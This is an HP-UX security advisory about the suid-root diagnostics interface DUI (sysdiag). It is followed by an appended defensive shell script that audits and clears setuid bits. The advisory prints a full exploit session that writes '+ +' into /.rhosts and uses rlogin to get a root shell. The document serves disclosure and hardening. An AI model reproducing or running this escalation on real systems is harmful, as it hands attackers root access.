COMMAND
/usr/diag/bin/DUI (called by /bin/sysdiag)
SYSTEMS AFFECTED
HP-UX all versions
PROBLEM
The sysdiag program is the interface to the online diagnostics
subsystem. When started, it runs /usr/diag/bin/DUI, which is suid
root. Here is an example (well, an exploit) that creates a /.rhosts
file containing "+ +"
(tested on hp720/9000, DUI ver. A.02.18):
$ ls -al /bin/sysdiag
-r-sr-xr-x 1 0 bin 18 Nov 30 1992 /bin/sysdiag
$ /bin/sysdiag
*****************************************************************
****** ******
****** ONLINE DIAGNOSTIC SYSTEM ******
****** ******
****** (C) Copyright Hewlett Packard Co. 1987, 1989, 1990 ******
****** All Rights Reserved ******
****** ******
****** DUI Version A.02.18 ******
****** Diagnostic Monitor Version A.02.19 ******
****** ******
*****************************************************************
Type "HELP" for assistance.
DUI >outfile /.rhosts
DUI >+ +
^
*** SYNTAX ERROR (DUISERR 501)
DUI >redo
+ +
(press enter)
DUI >+ +
^
*** SYNTAX ERROR (DUISERR 501)
DUI >exit
$ ls -al /.rhosts
-rwxr-xr-x 1 0 users 891 Nov 17 04:25 /.rhosts
$ rlogin localhost -l root
#
P.S. The error message
^
*** SYNTAX ERROR (DUISERR 501)
is shown on screen after keying in each command.
SOLUTION
If you do not need to run system diagnostics, remove the whole
package: all the files in /usr/diag/bin and the file /bin/sysdiag.
If you need to keep the package, change the permissions on all the
files in /usr/diag/bin and on /bin/sysdiag to owner-only access and
clear the suid bit. Check that all the files are owned by root.
Normal users will no longer be able to use sysdiag, but the system
manager will still be able to do so when logged in as root.
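As an added example that is not part of the advisory, the following POSIX shell script audits the paths named above for files that still carry the setuid bit and applies the owner-only, suid-cleared permissions the SOLUTION describes; the script name diag_harden.sh in the usage comment is an assumption.

```shell
#!/bin/sh
# Added example, not part of the original advisory: audit and apply the
# hardening the SOLUTION section describes for the diagnostics package.
# The default paths are the ones the advisory names; any path can be
# passed instead, which is how the functions can be exercised safely.

# Print every regular file under the given paths that still carries the
# setuid bit, the condition that lets DUI write files as root.
list_setuid() {
    find "$@" -type f -perm -4000 -print 2>/dev/null
}

# Print every regular file under the given paths that is not owned by root.
list_not_root_owned() {
    find "$@" -type f ! -user root -print 2>/dev/null
}

# Report remaining setuid files; exit status 0 only when none are left.
audit_diag() {
    n=$(list_setuid "$@" | wc -l | tr -d ' ')
    list_setuid "$@"
    [ "$n" -eq 0 ]
}

# Apply the advisory's fix to a package that is kept: owner-only access
# with the setuid bit cleared. Ownership is reported rather than changed,
# because chown to root only makes sense when this runs as root.
harden_diag() {
    find "$@" -type f -exec chmod u-s,go-rwx {} + 2>/dev/null
    bad=$(list_not_root_owned "$@" | wc -l | tr -d ' ')
    if [ "$bad" -ne 0 ]; then
        echo "warning: $bad file(s) not owned by root:" >&2
        list_not_root_owned "$@" >&2
        return 1
    fi
    return 0
}

# Usage (assumed script name): sh diag_harden.sh audit | harden
case "${1:-}" in
    audit)  audit_diag /usr/diag/bin /bin/sysdiag ;;
    harden) harden_diag /usr/diag/bin /bin/sysdiag ;;
esac
```

Run "audit" first on a system that keeps the package; a non-empty listing or a non-zero exit status means sysdiag is still exploitable as described above.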